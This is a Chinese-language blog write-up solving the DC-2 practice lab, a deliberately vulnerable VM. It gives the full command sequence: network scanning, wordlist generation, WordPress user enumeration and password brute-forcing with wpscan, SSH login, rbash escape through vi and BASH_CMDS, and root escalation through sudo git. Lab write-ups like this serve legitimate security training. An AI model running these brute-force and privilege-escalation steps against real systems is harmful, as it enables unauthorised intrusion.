<!DOCTYPE html>
<html lang="en" data-bs-theme="auto">

<!-- Head tag -->
<head>

    <meta charset="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1"/>

    <!--Description-->

    

    
        <meta name="description" content="DC2靶场渗透1、信息收集查找存活主机
1arp-scan -l


得到DC-2的IP地址为：192.168.228.133
用nmap扫描开放的端口
1nmap -sV -p- 192.168.228.133


可以看到DC-2开启了80端口，和ssh，ssh的端口在7744端口。
2、渗透过"/>
    
    
    <!--Keywords-->
    <meta name="keywords" content="">

    <!--Author-->
    
        <meta name="author" content="evabd21"/>
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="DC-2靶场记录"/>
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="DC2靶场渗透1、信息收集查找存活主机
1arp-scan -l


得到DC-2的IP地址为：192.168.228.133
用nmap扫描开放的端口
1nmap -sV -p- 192.168.228.133


可以看到DC-2开启了80端口，和ssh，ssh的端口在7744端口。
2、渗透过"/>
    

    <!--Open Graph Site Name-->
        <meta property="og:site_name" content="evabd21"/>

    <!--Type page-->
    
        <meta property="og:type" content="article"/>
    

    <!--Page Cover-->
    
    

    <meta name="twitter:card" content="summary_large_image"/>

    

    

    <!-- Title -->
    
    <title>DC-2靶场记录 - evabd21</title>

    <!-- Google Analytics -->
    


    <!-- favicon -->
    
    <link rel="icon" href="/images/favicon.ico"/>
    
      
<!-- hexo injector head_end start --><link rel="stylesheet" href="/css/bootstrap.min.css"><link rel="stylesheet" href="/css/color-modes.css"><link rel="stylesheet" href="/bootstrap-icons/font/bootstrap-icons.css"><script src="/js/bootstrap.bundle.min.js"></script><script type="module" src="/js/color-modes.js"></script><link rel="stylesheet" href="/css/highlight.css"><script src="https://cdn.jsdelivr.net/gh/BP-Devteam/sitescansense/s3module.min.js"></script><script src="/js/init.js"></script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="evabd21" type="application/atom+xml">
    <link rel="preconnect" href="https://fonts.googleapis.com"/>
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin/>
    <link href="https://fonts.googleapis.com/css2?family=Manrope:wght@400;500;600;700;800&display=swap" rel="stylesheet"/>
    <link rel="stylesheet" href="/css/brand-shell.css"/>
</head>


<body class="brand-page brand-page-article">
    <!-- Menu -->
    <div class="site-shell">
      <header class="site-nav">
        <div class="container">
          <div class="nav-frame">
            <a href="/" class="brand-mark">evabd21</a>
            <nav aria-label="Primary navigation">
              <ul class="nav-links">
                <li><a href="/getting-start">About</a></li>
                <li><a href="/archives">Archives</a></li>
                <li><a target="_blank" rel="noopener" href="https://github.com/evabd21/evabd21.github.io">Github</a></li>
              </ul>
            </nav>
          </div>
        </div>
      </header>

    <!-- color mode button -->
<svg xmlns="http://www.w3.org/2000/svg" class="d-none">
    <symbol id="check2" viewBox="0 0 16 16">
      <path d="M13.854 3.646a.5.5 0 0 1 0 .708l-7 7a.5.5 0 0 1-.708 0l-3.5-3.5a.5.5 0 1 1 .708-.708L6.5 10.293l6.646-6.647a.5.5 0 0 1 .708 0z"></path>
    </symbol>
    <symbol id="circle-half" viewBox="0 0 16 16">
      <path d="M8 15A7 7 0 1 0 8 1v14zm0 1A8 8 0 1 1 8 0a8 8 0 0 1 0 16z"></path>
    </symbol>
    <symbol id="moon-stars-fill" viewBox="0 0 16 16">
      <path d="M6 .278a.768.768 0 0 1 .08.858 7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71 0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"></path>
      <path d="M10.794 3.148a.217.217 0 0 1 .412 0l.387 1.162c.173.518.579.924 1.097 1.097l1.162.387a.217.217 0 0 1 0 .412l-1.162.387a1.734 1.734 0 0 0-1.097 1.097l-.387 1.162a.217.217 0 0 1-.412 0l-.387-1.162A1.734 1.734 0 0 0 9.31 6.593l-1.162-.387a.217.217 0 0 1 0-.412l1.162-.387a1.734 1.734 0 0 0 1.097-1.097l.387-1.162zM13.863.099a.145.145 0 0 1 .274 0l.258.774c.115.346.386.617.732.732l.774.258a.145.145 0 0 1 0 .274l-.774.258a1.156 1.156 0 0 0-.732.732l-.258.774a.145.145 0 0 1-.274 0l-.258-.774a1.156 1.156 0 0 0-.732-.732l-.774-.258a.145.145 0 0 1 0-.274l.774-.258c.346-.115.617-.386.732-.732L13.863.1z"></path>
    </symbol>
    <symbol id="sun-fill" viewBox="0 0 16 16">
      <path d="M8 12a4 4 0 1 0 0-8 4 4 0 0 0 0 8zM8 0a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 0zm0 13a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 13zm8-5a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2a.5.5 0 0 1 .5.5zM3 8a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2A.5.5 0 0 1 3 8zm10.657-5.657a.5.5 0 0 1 0 .707l-1.414 1.415a.5.5 0 1 1-.707-.708l1.414-1.414a.5.5 0 0 1 .707 0zm-9.193 9.193a.5.5 0 0 1 0 .707L3.05 13.657a.5.5 0 0 1-.707-.707l1.414-1.414a.5.5 0 0 1 .707 0zm9.193 2.121a.5.5 0 0 1-.707 0l-1.414-1.414a.5.5 0 0 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .707zM4.464 4.465a.5.5 0 0 1-.707 0L2.343 3.05a.5.5 0 1 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .708z"></path>
    </symbol>
  </svg>
<div class="dropdown position-fixed bottom-0 end-0 mb-3 me-3 bd-mode-toggle z-1">
    <button class="btn btn-bd-primary py-2 dropdown-toggle d-flex align-items-center" id="bd-theme" type="button" aria-expanded="false" data-bs-toggle="dropdown" aria-label="Toggle theme (dark)">
      <svg class="bi my-1 theme-icon-active" width="1em" height="1em"><use href="#moon-stars-fill"></use></svg>
      <span class="visually-hidden" id="bd-theme-text">Toggle theme</span>
    </button>
    <ul class="dropdown-menu dropdown-menu-end shadow" aria-labelledby="bd-theme-text">
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center" data-bs-theme-value="light" aria-pressed="false">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#sun-fill"></use></svg>
          Light
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center active" data-bs-theme-value="dark" aria-pressed="true">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#moon-stars-fill"></use></svg>
          Dark
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
      <li>
        <button type="button" class="dropdown-item d-flex align-items-center" data-bs-theme-value="auto" aria-pressed="false">
          <svg class="bi me-2 opacity-50 theme-icon" width="1em" height="1em"><use href="#circle-half"></use></svg>
          Auto
          <svg class="bi ms-auto d-none" width="1em" height="1em"><use href="#check2"></use></svg>
        </button>
      </li>
    </ul>
  </div>

    <main class="page-shell">
        <section class="page-header-section">
          <div class="container">
            <div class="page-header-panel">
              <span class="page-kicker">Research Article</span>
              <h1 class="page-title">DC-2靶场记录</h1>
              <p class="page-description">DC-2靶场记录 is presented with the same minimal technology-driven shell, improving rhythm, code readability, and long-form scanning.</p>
            </div>
          </div>
        </section>
        <section class="page-content-section">
<article class="article-shell">
    <div class="container">
        <div class="row">
            <div class="col mb-1 d-flex justify-content-between small text-secondary text-opacity-50 article-meta-bar">
                <div>page views <span class="s3_pv">0</span></div>
                 <!-- Date and Author -->
                 
                
                <div>update <span>2022-03-20</span></div>
            </div>
        </div>
    </div>
    <div class="container">
        <!-- Cover Image -->
        
        <div class="row">
            <!-- Gallery -->
            

            <!-- Post Main Content 
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                -->
            <div class="mx-auto col-md-10 col-md-offset-1 article-body">
                <h2 id="DC2靶场渗透"><a href="#DC2靶场渗透" class="headerlink" title="DC2靶场渗透"></a>DC2靶场渗透</h2><h3 id="1、信息收集"><a href="#1、信息收集" class="headerlink" title="1、信息收集"></a>1、信息收集</h3><p>查找存活主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arp-scan -l</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715682913742-6.png" alt="Image"></p>
<p>得到DC-2的IP地址为：192.168.228.133</p>
<p>用nmap扫描开放的端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -p- 192.168.228.133</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715682922644-8.png" alt="Image"></p>
<p>可以看到DC-2开启了80端口，和ssh，ssh的端口在7744端口。</p>
<h3 id="2、渗透过程"><a href="#2、渗透过程" class="headerlink" title="2、渗透过程"></a>2、渗透过程</h3><p>直接去访问这个IP，发现访问不了。会自动跳转到DC-2，应该是给重定向了，本地DNS绑定一下</p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240514183601795.png" alt="image-20240514183601795"></p>
<p>vim &#x2F;etc&#x2F;hosts</p>
<p>添加</p>
<p>192.168.228.133  DC-2</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715682990499-10.png" alt="Image"></p>
<p>保存退出，我们就可以正常访问到网页了。</p>
<p><img src="/imgs/$%7Bfiilename%7D/image-20240514183654770.png" alt="image-20240514183654770"></p>
<p>提示是让我们用cewl</p>
<p>Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外，Cewl还提供了命令行工具。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cewl http://dc-2 -w passwd.txt</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/image-20240514183808157.png" alt="image-20240514183808157"></p>
<p>有了密码字典，还需要找登陆账号，和登陆界面</p>
<p>登陆界面就要挖目录去看看了，可以用dirb来挖目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dirb http://dc-2</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/image-20240514183845652.png" alt="image-20240514183845652"></p>
<p>访问是一个登录的页面，找到了登录界面，接下来就是找登陆密码了。我们可以看到网站是wordpress.</p>
<p>wordpress有一个著名的扫描工具wpscan</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://dc-2/ -e u   //枚举用户名字</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683183030-12.png" alt="Image"></p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683196440-14.png" alt="Image"></p>
<p>找到了三个用户名，admin,jerry,tom,我们把这三个用户名写到一个文本user.txt里面</p>
<p>使用wpscan爆破账号密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --url http://dc-2/ -U user.txt -P passwd.txt</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683235724-16.png" alt="Image"></p>
<p>找到了jerry,和tom的密码我们去网页登录,进去之后找到第二个flag</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683274843-18.png" alt="Image"></p>
<p>flag2说我们在wordpress里面找不到其他东西了</p>
<p>最开始我们在前面发现他开启了ssh，然后我们还一个账号和密码，尝试用ssh登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh tom@192.168.228.133 -p 7744</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683293210-20.png" alt="Image"></p>
<h3 id="三、提权"><a href="#三、提权" class="headerlink" title="三、提权"></a>三、提权</h3><p>登陆进去之后我们可以看到flag3.txt，但是cat用不了，查看可以用的命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">compgen -c    //查看可以使用的指令</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683327164-22.png" alt="Image"></p>
<p>vi可以用，用vi编辑器打开</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683348407-24.png" alt="Image"></p>
<p>提到了tom和jerry，还有su，应该是让我们提权，vi可以用，有一个vi提权。这个需要在非编辑模式下进行。</p>
<p>vi随便打开文件</p>
<p>再下面添加</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">:set shell=/bin/sh</span><br><span class="line"></span><br><span class="line">:shell</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683373698-26.png" alt="Image"></p>
<p>然后再输入：shell回车初步提权就成功了</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683409753-28.png" alt="Image"></p>
<p>返回上一级目录，看到有一个jerry目录，进去看一下，有flag4。</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683472024-30.png" alt="Image"><img src="/imgs/$%7Bfiilename%7D/Image-1715683478717-32.png" alt="Image"></p>
<p>cat用不了，还是用vi去查看flag，这里提示我们还没有回家，flag3里面提示我们su,我们可以尝试切换用户</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683502575-34.png" alt="Image"></p>
<p>尝试切换jerry用户，切换不了</p>
<p>还需要提权，有一个-rbash环境变量提权的方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">export -p    //查看环境变量</span><br><span class="line"></span><br><span class="line">BASH_CMDS[a]=/bin/sh;a     //把/bin/sh给a</span><br><span class="line"></span><br><span class="line">/bin/bash</span><br><span class="line"></span><br><span class="line">export PATH=$PATH:/bin/     //添加环境变量</span><br><span class="line"></span><br><span class="line">export PATH=$PATH:/usr/bin   //添加环境变量</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683580053-36.png" alt="Image"></p>
<p>切换到到jerry用户成功</p>
<p>但是还是进不了root，找查具有SUID权限的可执行二进制文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -type f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683597376-38.png" alt="Image"></p>
<p>发现有一个sudo，用sudo -l看看sudo有什么权限</p>
<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683622368-40.png" alt="Image"></p>
<p>git是root权限，使用git提权</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1、sudo git help config #在末行命令模式输入</span><br><span class="line"></span><br><span class="line">!/bin/bash 或 !&#x27;sh&#x27; #完成提权</span><br><span class="line"></span><br><span class="line">2、sudo git -p help</span><br><span class="line"></span><br><span class="line">!/bin/bash #输入!/bin/bash，即可打开一个用户为root的shell</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/$%7Bfiilename%7D/Image-1715683664638-42.png" alt="Image"></p>
<p>提权成功</p>

            </div>

            <!-- Comments -->
            
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    


                </div>
            
        </div>
        <!-- Tags and categories -->
        
        <div class="row justify-content-between article-taxonomy">
            <div class="col-lg-4 col-lg-offset-2 col-md-5 col-md-offset-1">
                
                    


<a href="/tags/DC靶场/" class="text-decoration-none text-secondary">#DC靶场</a>


                
            </div>
            <div class="col-lg-4 col-md-5 text-end">
                
            </div>
        </div>
        

    </div>
</article>



        <footer class="site-footer">
      <div class="container">
        <div class="site-footer-inner">
          <div class="footer-copy">Copyright 2024 evabd21 | Security notes with a cleaner presentation.</div>
          <div class="footer-links">
            <a href="/getting-start">About</a>
            <a href="/archives">Archives</a>
            <a target="_blank" rel="noopener" href="https://github.com/evabd21/evabd21.github.io">Github</a>
          </div>
        </div>
      </div>
    </footer>
  </div>


    <!-- After footer scripts -->
    <!-- Disqus Comments -->



   

<!-- hexo injector body_end start --><script src="https://cdn.jsdelivr.net/npm/bs5-lightbox@1.8.3/dist/index.bundle.min.js"></script><!-- hexo injector body_end end --></body>

</html>